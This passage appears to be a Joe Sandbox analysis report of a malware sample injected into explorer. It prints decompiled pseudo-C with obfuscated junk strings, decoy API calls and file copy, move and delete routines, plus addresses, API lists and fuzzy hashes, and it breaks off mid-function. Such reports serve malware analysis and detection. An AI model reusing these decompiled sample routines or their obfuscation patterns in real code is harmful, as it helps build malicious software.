				_t17 = GetCurrentProcess();
				_t18 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t18, _t17, 0xf897c0, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t22 =  *0xf897cc; // 0x547fb10
				_v28 = _t22;
				_t60 = E00F592B1(_t54, _t71,  &_v28, E00F58FD0);
				__eflags = _t60;
				if(_t60 >= 0) {
					_push(0);
					_push( *0xf89800);
					_t48 = 0x27;
					E00F5C403(_t48);
				}
				__eflags = _v24;
				if(_v24 != 0) {
					E00F5A34A( &_v24);
				}
				_t25 =  *0xf89740; // 0x547f6c8
				 *((intOrPtr*)(_t25 + 0x30))( *0xf897c0);
				 *0xf897c0 = 0;
				__eflags =  *0xf89830; // 0x0
				if(__eflags != 0) {
					 *0xf89820 = 1;
				}
				_t27 =  *0xf89740; // 0x547f6c8
				 *((intOrPtr*)(_t27 + 0x90))( *0xf897a0);
				_t29 = _t60;
				goto L16;
			}

0x00f597b0
0x00f597b0
0x00f597be
0x00f597be
0x00f597ca
0x00f597cf
0x00000000
0x00000000
0x00f597dd
0x00f597e2
0x00f597e8
0x00f597ee
0x00f597f4
0x00f597f6
0x00f597fa
0x00f5982e
0x00f59834
0x00f59804
0x00f59804
0x00f59809
0x00f5980a
0x00f59818
0x00000000
0x00f5981a
0x00f5981a
0x00f59824
0x00000000
0x00f59824
0x00f59818
0x00f598ed
0x00f598f3
0x00f598f3
0x00f59840
0x00f59855
0x00f59858
0x00f59862
0x00f5986e
0x00f5986f
0x00f59870
0x00f59871
0x00f59872
0x00f59877
0x00f5988a
0x00f5988e
0x00f59890
0x00f59892
0x00f59893
0x00f5989b
0x00f5989c
0x00f598a2
0x00f598a3
0x00f598a7
0x00f598ae
0x00f598b3
0x00f598ba
0x00f598bf
0x00f598c2
0x00f598c8
0x00f598ce
0x00f598d0
0x00f598d0
0x00f598e0
0x00f598e5
0x00f598eb
0x00000000

APIs

IsValidCodePage.KERNEL32(00000038,?,?,00000000,?,?,?,00F51409), ref: 00F5982E
GetCurrentProcess.KERNEL32(00F897C0,00000000,00000000,00000002,?,?,00000000,?,?,?,00F51409), ref: 00F59855
GetCurrentThread.KERNEL32 ref: 00F59858
GetCurrentProcess.KERNEL32(00000000,?,?,00000000,?,?,?,00F51409), ref: 00F5985F
DuplicateHandle.KERNEL32(00000000,?,?,00000000,?,?,?,00F51409), ref: 00F59862

Part of subcall function 00F5CEF9: GetSystemTimeAsFileTime.KERNEL32(?,?,00F54CCA,00000000), ref: 00F5CF03
Part of subcall function 00F5CEF9: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F5CF23

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Current$ProcessTime$CodeDuplicateFileHandlePageSystemThreadUnothrow_t@std@@@Valid__ehfuncinfo$??2@
String ID:
API String ID: 2943338434-0
Opcode ID: 765f1c449545d276981f506ce19d626b54de11e7addd37e227324fdbcb5b265e
Instruction ID: b695407041117bff5a62ae2f86559996fa01a93c59c029e0467ac21d0e1fb7bb
Opcode Fuzzy Hash: 765f1c449545d276981f506ce19d626b54de11e7addd37e227324fdbcb5b265e
Instruction Fuzzy Hash: 9131887151C208DFD704AFA4EC89DBA77A8FB08352F480569FA06D6161D7B1984CFB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F51C68, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F51C68(intOrPtr* _a4) {
				short _v68;
				char _v69;
				char _v84;
				void* __esi;
				signed int _t12;
				void* _t16;
				int _t23;
				void* _t26;
				void* _t28;
				void* _t33;
				signed int _t36;
				signed int _t40;
				intOrPtr* _t43;
				void* _t44;
				signed int _t46;
				void* _t48;

				_t48 = (_t46 & 0xfffffff8) - 0x54;
				_t43 = _a4;
				_push(_t36);
				if( *_t43 != 1) {
					if(__eflags <= 0) {
						goto L3;
					} else {
						goto L10;
					}
					L11:
				} else {
					_t23 = lstrcmpA( *( *(_t43 + 4)), "full");
					_t50 = _t23;
					if(_t23 != 0) {
						L10:
						_t40 = _t36 | 0xffffffff;
					} else {
						_push(_t23);
						_push(1);
						_t33 = 0x34;
						E00F5C403(_t33);
						L3:
						_push(0);
						_push(0xd);
						_t28 = 0x38;
						E00F5C403(_t28);
						_t12 = E00F512D5(_t50);
						asm("sbb edi, edi");
						_t40 = ( ~_t12 & 0x00000004) - 2;
					}
				}
				E00F5B78C(_t43, _t43 + 4);
				GetLastError();
				_t16 = E00F5ACD6("QW6v2PU8gCKDwo Zfw  0ojF0H9iaWRnc2m6VplMdMNh52R3ssk6l422 HtC 4sS7o4zYW 21QN aENLAo4pzoPYR7yC.Dx Kt7kozf CQh2bkb50iF ,IlgHvE.3346bhA9LWR2680AaD6NX bsCH,uKXfjCcgfkczxVffv3VgwLm9ScJno1Sf2jMlCAfNj.eCteIUd4d85 renE2u0.LY SOADRPFqpmPHUCyyPOPOL1NXS5be0 b Ag,vIE25TpVpyi8KaccXAs7K woU4ALoH.QBu.qkdRBkjFqiPkC6JXi5OGs9VRfMX,Pzk4rgvwbyjiUEna1PozC 4,iZE7QQD B1nj,bxo0k s63tzslBYmMTkWK O1K8wgaV Jdtbe4yj u c1Cs1tBYPPYxj3IWEThD9ghCVV6VEJl1 XaHYGpW1 DE7E.zjOUoM8DZ z3LVmeg bS581CbawxUSrgE62rht7c5rPiMZCu,bi QUaTDWKajtj7lnBajve X70TTrV5g8o2 DlTGdgxIaCigU8oB rxSLzMkDHHN6YYMc9BNRE9ASmD0meUkFUevxSc.i0IKfPf.VihcGRFxXMQTh,m45trLSjjjgqrZeTt13 .FmepFGB55RkZf0aL2b3  sbfFx28lTJrj22u88bFCyZzYz V9mcMt5unFe4hyzMwPMvS0amW2vMkwt4TMGw5Sq3698 6fAImA8XRGX,akS7d Nw5yEN Ghu,mqNI7q3JXbvCyMjbDHYvZQhE5K1IkQFCgk D VH4L d3A6OnW9nPBpB 9S19XH8s2M7fOxK1b 3zST FrAYF3.vL52p7gqdAgZ45JkqCKYFGT,f qDg,Or2qXZbVSDauWyms,h .rk6yS8i hgvMDhtUWAnuGuAXHOXmv6xrsE3UMiHTeJl6Ti89E3oC9aedzl7Rdzerc8S6e J9.HBD0WVz3 jUBG4SfrSgtS7toxcjAd3cH6flpj859kchK4fHkusKs.QbvIQ3oJJGwhoHctbEtEW5mx6j0D SReVn1U2dSB92q.0VuFrQ5Bw7SaN,JJ5Z tDAZyvhSq2aeFKUgYqfD.mFr,qh3Dkj3v0dZuCq 0OptnIB5RicTg lyw9bxZms4q.dAxs0SLg4W1QHrYHkM24ACh.WuyKj43EL.iwMNkN0H1lYpPWZQ rqN3PUHtMuuNpW4F7pGYWUHpux.eiUCvMeqvsBUC1KVNEaF4Z DBRxMg,mfYKBtw 7uFpfPJ H cP SyfXTOYEI8x88dvWkO0I5s84zdLVSF iNaqsg0fqnwG3d1Ez5KECicror2 hTqxOC LKwzVzLmvONFHiV,X8Vn34SMYaXDv4uTJh3vpyI4A0,iWSTGVYdDGClarFwjg8r evok6TZo2j7CbfK9W05u jkxwHMUQCCjgR rSGQq0hU7bP18buph2Sgp3L,xtqpJQL3mtIQP9YDiSjmfOXNhersX96EfMNLOL586HBmzl5sDwEPvAI,Zxafd2i8qhdWd,fFYZ0sH7K5sdW3TG271ZoY27iSErJJBI4Y .3LYab3R2qFlMUZPXFGrWRRv89MCQ0gcnxKLaKTagUWuXtsA70Pliwf s5cQ5SBBH2tEL5xDF K4yRQhU8AwZznN ps FgVg PNe6sQBTACMy,HsNQph84Sua17gAlwjIL6k10Bu5jhMpUPEsVO7U0DZh,Oekq0HbIc iUneOII2fvIDzjUjHCuQDXI4 U,fUs6LmF7RJBH iEtwmcO6aEGZh5toDXDCzy,LQDgLPhaeMRzVfL.lY gDdazdppUC cO5bJiIG1ICoex7");
				_t44 = 0xf;
				if(_t16 <= _t44) {
					_t44 = _t16;
				}
				_t26 = 0;
				_v69 = 0;
				if(_t44 != 0) {
					do {
						_t5 = _t26 + 0x42; // 0x42
						 *((char*)(_t48 + _t26 + 0x14)) = _t5;
						MultiByteToWideChar(0, 0,  &_v84, 0xffffffff,  &_v68, 0x20);
						_t26 = _t26 + 1;
					} while (_t26 < _t44);
				}
				return _t40;
				goto L11;
			}

0x00f51c6e
0x00f51c73
0x00f51c78
0x00f51c7c
0x00f51d24
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00f51c82
0x00f51c8c
0x00f51c92
0x00f51c94
0x00f51d26
0x00f51d26
0x00f51c9a
0x00f51c9a
0x00f51c9b
0x00f51c9f
0x00f51ca0
0x00f51ca7
0x00f51ca7
0x00f51ca9
0x00f51cad
0x00f51cae
0x00f51cb5
0x00f51cbe
0x00f51cc3
0x00f51cc3
0x00f51c94
0x00f51cca
0x00f51cd0
0x00f51cdb
0x00f51ce3
0x00f51ce6
0x00f51ce8
0x00f51ce8
0x00f51cea
0x00f51cec
0x00f51cf3
0x00f51cf5
0x00f51cf7
0x00f51cfa
0x00f51d0e
0x00f51d14
0x00f51d15
0x00f51cf5
0x00f51d21
0x00000000

APIs

lstrcmpA.KERNEL32(?,full), ref: 00F51C8C
GetLastError.KERNEL32 ref: 00F51CD0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F51D0E

Strings

QW6v2PU8gCKDwo Zfw 0ojF0H9iaWRnc2m6VplMdMNh52R3ssk6l422 HtC 4sS7o4zYW 21QN aENLAo4pzoPYR7yC.Dx Kt7kozf CQh2bkb50iF ,IlgHvE.3346bhA9LWR2680AaD6NX bsCH,uKXfjCcgfkczxVffv3VgwLm9ScJno1Sf2jMlCAfNj.eCteIUd4d85 renE2u0.LY SOADRPFqpmPHUCyyPOPOL1NXS5be0 b Ag,vIE25TpVp, xrefs: 00F51CD6
full, xrefs: 00F51C85

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWidelstrcmp
String ID: QW6v2PU8gCKDwo Zfw 0ojF0H9iaWRnc2m6VplMdMNh52R3ssk6l422 HtC 4sS7o4zYW 21QN aENLAo4pzoPYR7yC.Dx Kt7kozf CQh2bkb50iF ,IlgHvE.3346bhA9LWR2680AaD6NX bsCH,uKXfjCcgfkczxVffv3VgwLm9ScJno1Sf2jMlCAfNj.eCteIUd4d85 renE2u0.LY SOADRPFqpmPHUCyyPOPOL1NXS5be0 b Ag,vIE25TpVp$full
API String ID: 2049212733-73368539
Opcode ID: 389275f11afb5b013410bc2df8ab82b6ba1f41c23a8153cb5dec05c0435007e9
Instruction ID: d1d7862d74ac16b9cc2ffb33f830000ec6b3b9389537be9f624eb1318e1946fd
Opcode Fuzzy Hash: 389275f11afb5b013410bc2df8ab82b6ba1f41c23a8153cb5dec05c0435007e9
Instruction Fuzzy Hash: 54113A336403045AE234AA64DC46F6A7798FB40B71F204626FF25DA1C0DE62E94CA292

Uniqueness

Uniqueness Score: -1.00%

Function 00F5B214, Relevance: 7.6, APIs: 5, Instructions: 58
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00F5B214(WCHAR* __edi, void* __fp0, WCHAR* _a4) {
				signed int _v8;
				char _v12;
				void _v530;
				short _v532;
				int _t16;
				intOrPtr _t22;
				void* _t32;

				_v8 = _v8 & 0x00000000;
				_t16 = CopyFileW(_a4, __edi, 0);
				_t37 = _t16;
				if(_t16 != 0) {
					L4:
					DeleteFileW(_a4);
				} else {
					_v532 = _t16;
					memset( &_v530, _t16, 0x206);
					_v12 = E00F62CCE(_t32, 0xabb);
					_t22 =  *0xf89720; // 0xf90000
					_push(E00F6D918(_t37, __fp0, _t22 + 0x648, 1, 0xf4240));
					E00F5CE46( &_v532, 0x103, _v12, __edi);
					E00F5BA86( &_v12);
					if(MoveFileW(__edi,  &_v532) == 0 || CopyFileW(_a4, __edi, 0) == 0) {
						_v8 = _v8 | 0xffffffff;
					} else {
						goto L4;
					}
				}
				return _v8;
			}

0x00f5b21d
0x00f5b22e
0x00f5b230
0x00f5b232
0x00f5b2bb
0x00f5b2be
0x00f5b238
0x00f5b23e
0x00f5b24c
0x00f5b25b
0x00f5b25e
0x00f5b275
0x00f5b286
0x00f5b28f
0x00f5b2a7
0x00f5b2b5
0x00000000
0x00000000
0x00000000
0x00f5b2a7
0x00f5b2c9

APIs

CopyFileW.KERNEL32(00F5B1F5,00000000,00000000,00000200), ref: 00F5B22E
memset.MSVCRT ref: 00F5B24C

Part of subcall function 00F5CE46: _vsnwprintf.MSVCRT ref: 00F5CE63

MoveFileW.KERNEL32(00000000,?), ref: 00F5B29F
CopyFileW.KERNEL32(00F5B1F5,00000000,00000000), ref: 00F5B2AF
DeleteFileW.KERNEL32(00F5B1F5), ref: 00F5B2BE

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: File$Copy$DeleteMove_vsnwprintfmemset
String ID:
API String ID: 1114508814-0
Opcode ID: 657a061139793d3699b90e6b6c3db10f8fbf0afc866ee6b6c3ea215ce17e4ca4
Instruction ID: 7bedff2d27aba83bce724b30bf287f4ac6265d5e07d58dc87d0b74869a2afe6e
Opcode Fuzzy Hash: 657a061139793d3699b90e6b6c3db10f8fbf0afc866ee6b6c3ea215ce17e4ca4
Instruction Fuzzy Hash: 3211707194020CBADF21EBA4CC4AFEE7B7CFF14711F004455BE14E6091D7B49A88AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F6F503, Relevance: 7.6, APIs: 5, Instructions: 57
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00F6F503(char* __eax, long long __fp0, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t12;
				signed int _t14;
				char** _t24;
				char _t27;
				long long _t34;
				void* _t37;

				_t34 = __fp0;
				_t12 = __eax;
				L00F70762();
				_t27 =  *__eax;
				_t24 = _a4;
				if( *_t27 != 0x2e) {
					_t12 = strchr( *_t24, 0x2e);
					if(_t12 != 0) {
						 *_t12 =  *_t27;
					}
				}
				L00F7073E();
				 *_t12 =  *_t12 & 0x00000000;
				_t14 = strtod( *_t24,  &_v8);
				_v16 = _t34;
				_t37 = st0;
				asm("fucomp st2");
				asm("fnstsw ax");
				st1 = _t37;
				if((_t14 & 0x00000044) != 0) {
					st0 = _t37;
					goto L7;
				} else {
					asm("fchs");
					asm("fucompp");
					asm("fnstsw ax");
					if((_t14 & 0x00000044) != 0) {
						L7:
						L00F7073E();
						if( *_t14 != 0x22) {
							goto L5;
						} else {
							return _t14 | 0xffffffff;
						}
					} else {
						L5:
						 *_a8 = _v16;
						return 0;
					}
				}
			}

0x00f6f503
0x00f6f503
0x00f6f50b
0x00f6f510
0x00f6f515
0x00f6f518
0x00f6f51e
0x00f6f527
0x00f6f52b
0x00f6f52b
0x00f6f527
0x00f6f52d
0x00f6f532
0x00f6f53b
0x00f6f540
0x00f6f54e
0x00f6f551
0x00f6f554
0x00f6f556
0x00f6f55b
0x00f6f577
0x00000000
0x00f6f55d
0x00f6f55d
0x00f6f562
0x00f6f564
0x00f6f569
0x00f6f579
0x00f6f579
0x00f6f581
0x00000000
0x00f6f583
0x00f6f587
0x00f6f587
0x00f6f56b
0x00f6f56b
0x00f6f571
0x00f6f576
0x00f6f576
0x00f6f569

APIs

localeconv.MSVCRT ref: 00F6F50B
strchr.MSVCRT ref: 00F6F51E
_errno.MSVCRT ref: 00F6F52D
strtod.MSVCRT ref: 00F6F53B
_errno.MSVCRT ref: 00F6F579

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: cad4095d549cac56b8e8723efd012e4f483447039ffe08f130ec3d3c2ba180c6
Instruction ID: cb757177d564cca316abffe13546c22141ae09ee5a8ee0f1a6f0b412b430dfa5
Opcode Fuzzy Hash: cad4095d549cac56b8e8723efd012e4f483447039ffe08f130ec3d3c2ba180c6
Instruction Fuzzy Hash: 4A012232D00149EADF152B20F9456D97FB4AF0A370F2081D1F099660D1CF39AC95EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F56CCD, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00F56CCD(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v80;
				intOrPtr _v84;
				void* __ebx;
				void* __esi;
				signed int _t129;
				intOrPtr _t144;
				void* _t154;
				intOrPtr _t181;
				void* _t190;
				void* _t192;
				void* _t193;
				void* _t205;
				void* _t221;

				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = E00F57335(__edx,  &_v20,  &_v32);
				if(_v28 != 0 || _v32 >= 0) {
					_v24 = E00F61785(0, _a4, E00F5ACD6(_a4));
					_v16 = E00F61785(0, _a8, E00F5ACD6(_a8));
					_t129 = E00F5ACD6(_a8);
					_pop(_t205);
					_v36 = _t129;
					_v12 = E00F56C88(_t129, _t205, _v24, _v28, _v20);
					if(_v12 >= 0) {
						_v16 = E00F61785(0, _a8, _v36);
						BitBlt(0, 0x5c, 0x2a, 0x2b, 0xf, 0, 0x4e, 0x4e, 0x19);
						if( *((intOrPtr*)(_v28 + 8 + _v12 * 0x18)) != _v16) {
							while(0 != 0) {
							}
							_t66 = 0xc + _v12 * 0x18; // 0xc
							E00F5AB81(_v28 + _t66, 0);
							_t144 = E00F5AC29(_a8, _v36 + 1);
							_t237 = _v28;
							 *((intOrPtr*)(_v28 + 0xc + _v12 * 0x18)) = _t144;
							if( *((intOrPtr*)(_v28 + 0xc + _v12 * 0x18)) != 0) {
								_v8 = 1;
								while(0 != 0) {
								}
								L33:
								 *((intOrPtr*)(_v28 + 8 + _v12 * 0x18)) = _v16;
								_t237 = _v36;
								 *((intOrPtr*)(_v28 + 0x10 + _v12 * 0x18)) = _v36;
								 *((intOrPtr*)(_v28 + 4 + _v12 * 0x18)) = 1;
								_t154 = E00F56FAF(_v36, _v28, _v20);
								_pop(_t221);
								if(_t154 >= 0) {
									_v40 = _v40 & 0x00000000;
									_v40 = E00F57721(_t154, _t221, _v24);
									_v44 = 0x24;
									_v84 = E00F5ABE5( &_v80, "C5yaeKJOYI5pLxPMSdSb.Ic5h.A4 pJpy f9sgzw Lg3LIQ9MzFn4Tf7kLJXBaTgbcsu43qn3V79tXOKBBRWFY6PzrJ5idD0XieGyfcAjp,PtCdIOAy.5U0DgHYcg,tivVL2GncwN.7cCkHr rJo,nzqzYUlV4mOjG0nVbDzg7a pttm2g68QK4ViUaN c37Utt 9Tzb9sKTECnUcHi ds4gPtaAs5nFp89XFyaOB5IHO 1lqNhcKKscSTdc691dcI3 SBy5vIv,XRW5CpQZ.q GF aEr3.hP72 I qwNEIvZ3I0FOy1bFIY,BxAoVlYHPpF PN,x54,qu6LD5I 920IdB108L8hBakWFPEs4NXbzUFLENyswtoDn9RQCZCNyVA3q7Cab6N,KDKERZ HG1EZ1Pj4xmnXW r1  4tOvEw6X,hvz GCNA39jDVjJH5TW60w eHXKAh PJ3kz3aepzc2,gHpNuVaylQUAImVs1zeHcYenzMLLis1Zda5XQ Ueg4Kic iHu2T3859u4otmQExlqNci51izGrewNqmoypwIS7U04.3LjDgqpsZeGWF K4 0 liY7lURheKcKN1f4jhmhbBNaAt19jpBcRS3UMQYY BtLARrRNE,AK2KmV7t1Bp7GaMI8H5,MQ1ke4GPXrndrGU5c6ObHNE7M2wZodm.AcP72UjhHEvuX6  x3P KSJKHtBF1I7z6kEsYr0T0kL4JPQS .D6PoKn4hr6BQOUux6kE9B8yQYAxiDyagy 4p t0qYgJ S.JUjfhwOO1G tZcCaiX bgV6hzpYILrfGjmTUhYtjDVXW4oI6kqbVtfv 1admrfGcz 8K2qAI3B4bws 5Q58DpWuxQrm4X T 7XSjoIAjpV021eB41dVtnDApt3MdfQPlraw1AS IwzvAexVzvgMCRkP63nCzw5bHfo9xdgNEQZ89yeF.Gi0wOB,rr7DCJncYXTcIpVeswyB951IJoZQ4qJziOuq.gWk1QMVIy07iPqLbQngvC TTuLJDaPyoifqAV7ovHpcB 2aNsSQh,2Q7Hpwzoy0PbX,6L.yXGzWumG076uhGNOOVxAyqMgFBAF0d8RwQl3ewwEApLi60P 8U0zPUf GfcnIUlemV90cQDhPz1LnmUJryo2f8r6ac5Z0awB gEYu.rdbzWF8O,  llISE FG fKvwA qhO9BgFSYzhJRpCLGGkS7Jmt,q 1.Lt6HuNQ0AkYjfezS4EST5zd21,pqqA rO4xSYjmCBnPGID3uhhFk j0p5Nq6Edb8TzxYPeQF3yuSAW 6 IRKdidgegC9TAegf4G78A11Eq18EZQ,go4RTeqPuG9I8RttAfWdCd,5bE5 MhY5FjOx m1 W8T1jj23FWDAIUmbnqrwqLqHiThOQnA JCg,qlIiy7aswksLkSmbb9yNZQsPK9Y0OFGXh fWFkZ 0RXzL1PUizJf0 th9Z M n66Vh 5X6jne5T0t16.PFPhAmt3m.IFiL0aMBZXbn2lGAggt Rl53P1981eQslh,8IljWI0J9i6Z3 hQsdMrAgYpHLiZ8S4 dv et6bGH  USD0u.3.rbLdTye2z5t, MRQOLAaU45gy0TveJicM5yNSZF2o2KAbJ9Vq. 45uX5Uqnil9pZa.oWR.UclXi6PDbL,mr2SDw7FsEgN8O4AB84YijbLXwClopGprCaWbq qo0CJNYOu4RJ3 Q6znN,VVFQ  GqM10dokon5z.w  EMoheMtLjsOAX", _v44);
									if(_v40 >= 0) {
										E00F577A7(_v40);
									}
									E00F56628( *((intOrPtr*)(_v28 + _v12 * 0x18)),  *((intOrPtr*)(_v28 + 0xc + _v12 * 0x18)),  *((intOrPtr*)(_v28 + 0x10 + _v12 * 0x18)), 0);
								} else {
									_v8 = 0xfffffff9;
								}
								L38:
								E00F5629A(_t237,  &_v28, _v20);
								return _v8;
							}
							while(0 != 0) {
							}
							_v8 = 0xfffffffb;
							goto L38;
						}
						while(0 != 0) {
						}
						_v8 = _v8 & 0x00000000;
						goto L38;
					}
					if((_a12 & 0x00000002) == 0) {
						if(E00F5AC9A((_v20 + 1) * 0x18,  &_v28, _v20 * 0x18) != 0) {
							_v12 = _v20;
							_v20 = _v20 + 1;
							_t181 = E00F5AC29(_a8, _v36 + 1);
							_t237 = _v28;
							 *((intOrPtr*)(_v28 + 0xc + _v12 * 0x18)) = _t181;
							if( *((intOrPtr*)(_v28 + 0xc + _v12 * 0x18)) != 0) {
								 *((intOrPtr*)(_v28 + _v12 * 0x18)) = _v24;
								_v8 = 1;
								while(0 != 0) {
								}
								goto L33;
							}
							while(0 != 0) {
							}
							_v8 = 0xfffffffc;
							goto L38;
						}
						while(0 != 0) {
						}
						IsValidCodePage(8);
						_t190 = 0xfffffffd;
						return _t190;
					}
					while(0 != 0) {
					}
					_t192 = 0xffffffec;
					return _t192;
				} else {
					_t193 = 0xfffffff8;
					return _t193;
				}
			}

0x00f56cd5
0x00f56cd9
0x00f56cdd
0x00f56ce1
0x00f56ce5
0x00f56cf8
0x00f56cff
0x00f56d25
0x00f56d3e
0x00f56d44
0x00f56d49
0x00f56d4a
0x00f56d5e
0x00f56d65
0x00f56e32
0x00f56e47
0x00f56e5d
0x00f56e73
0x00f56e77
0x00f56e84
0x00f56e89
0x00f56e98
0x00f56ea5
0x00f56ea8
0x00f56eba
0x00f56ed3
0x00f56eda
0x00f56ede
0x00f56ee0
0x00f56eec
0x00f56ef9
0x00f56efc
0x00f56f09
0x00f56f17
0x00f56f1d
0x00f56f20
0x00f56f2d
0x00f56f3a
0x00f56f3d
0x00f56f58
0x00f56f5f
0x00f56f64
0x00f56f69
0x00f56f92
0x00f56f22
0x00f56f22
0x00f56f22
0x00f56f9a
0x00f56fa1
0x00000000
0x00f56fa8
0x00f56ebc
0x00f56ec0
0x00f56ec2
0x00000000
0x00f56ec2
0x00f56e5f
0x00f56e63
0x00f56e65
0x00000000
0x00f56e65
0x00f56d71
0x00f56d9a
0x00f56db5
0x00f56dbc
0x00f56dc7
0x00f56dd4
0x00f56dd7
0x00f56de9
0x00f56e0e
0x00f56e11
0x00f56e18
0x00f56e1c
0x00000000
0x00f56e1e
0x00f56deb
0x00f56def
0x00f56df1
0x00000000
0x00f56df1
0x00f56d9c
0x00f56da0
0x00f56da4
0x00f56dac
0x00000000
0x00f56dac
0x00f56d73
0x00f56d77
0x00f56d7b
0x00000000
0x00f56d07
0x00f56d09
0x00000000
0x00f56d09

APIs

IsValidCodePage.KERNEL32(00000008,?,?), ref: 00F56DA4

Strings

$, xrefs: 00F56F3D
C5yaeKJOYI5pLxPMSdSb.Ic5h.A4 pJpy f9sgzw Lg3LIQ9MzFn4Tf7kLJXBaTgbcsu43qn3V79tXOKBBRWFY6PzrJ5idD0XieGyfcAjp,PtCdIOAy.5U0DgHYcg,tivVL2GncwN.7cCkHr rJo,nzqzYUlV4mOjG0nVbDzg7a pttm2g68QK4ViUaN c37Utt 9Tzb9sKTECnUcHi ds4gPtaAs5nFp89XFyaOB5IHO 1lqNhcKKscSTdc691dcI3 , xrefs: 00F56F47

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CodePageValid
String ID: $$C5yaeKJOYI5pLxPMSdSb.Ic5h.A4 pJpy f9sgzw Lg3LIQ9MzFn4Tf7kLJXBaTgbcsu43qn3V79tXOKBBRWFY6PzrJ5idD0XieGyfcAjp,PtCdIOAy.5U0DgHYcg,tivVL2GncwN.7cCkHr rJo,nzqzYUlV4mOjG0nVbDzg7a pttm2g68QK4ViUaN c37Utt 9Tzb9sKTECnUcHi ds4gPtaAs5nFp89XFyaOB5IHO 1lqNhcKKscSTdc691dcI3
API String ID: 1911128615-3363442464
Opcode ID: 79f9b974e3541e3738f03ca905fa5dc5529d8979be430888ea013c64761c8e89
Instruction ID: 35b30eb7c585cc3236b0b377518bfa46c350b357e5e7ce8d719f74baa91e49ac
Opcode Fuzzy Hash: 79f9b974e3541e3738f03ca905fa5dc5529d8979be430888ea013c64761c8e89
Instruction Fuzzy Hash: 48A19172E04209AFCF04CF94DC46BADBBF0FB04326F604519EA21EB191DB359945EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F57A10, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00F57A10(intOrPtr _a4, intOrPtr _a8) {
				struct HDC__* _v8;
				char _v12;
				char _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				signed short* _t39;
				intOrPtr* _t40;
				void* _t41;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				intOrPtr _t54;
				signed char _t55;
				signed int _t60;
				signed int _t61;
				void* _t63;
				void* _t64;
				signed int _t75;
				signed int _t80;

				_t54 =  *0xf89720; // 0xf90000
				_v8 = _v8 | 0xffffffff;
				_t39 =  *(_t54 + 0x434);
				while(1) {
					_t60 =  *_t39 & 0x0000ffff;
					if(_t60 == 0) {
						if( *_t39 != 0x3a) {
							_t39 = 0;
						}
						break;
					}
					if(_t60 == 0x3a) {
						break;
					} else {
						_t39 =  &(_t39[1]);
						continue;
					}
				}
				_t55 =  *(_t54 + 0x1898);
				if((_t55 & 0x00000400) != 0 || (_t55 & 0x00000300) == 0 && (_t55 & 0x00000011) == 0) {
					if(_t39 == 0) {
						_v28 = E00F579C9;
						_v24 = E00F57D46;
					} else {
						_v28 = E00F57B72;
						_v24 = E00F57BA9;
					}
				} else {
					if(_t39 == 0) {
						_v28 = E00F57D46;
						_v24 = E00F579C9;
					} else {
						_v28 = E00F57BA9;
						_v24 = E00F57B72;
					}
				}
				_t61 = 0;
				do {
					_t40 =  *((intOrPtr*)(_t63 + _t61 * 4 - 0x18));
					if(_t40 == 0) {
						goto L27;
					}
					_t44 =  *_t40(_a4, _a8,  &_v16);
					_t64 = _t64 + 0xc;
					if(_t44 != 0) {
						_v8 = _v8 | 0xffffffff;
						goto L27;
					}
					_t45 =  *0xf89740; // 0x547f6c8
					_v12 = 0;
					 *((intOrPtr*)(_t45 + 0xb4))(0x1387);
					_v8 = E00F5D103(_a8,  &_v12);
					_t49 = E00F5CEF9(_t60, 0);
					_t64 = _t64 + 0xc;
					_t75 = _t60;
					if(_t75 <= 0 && (_t75 < 0 || _t49 < 0x2bcf)) {
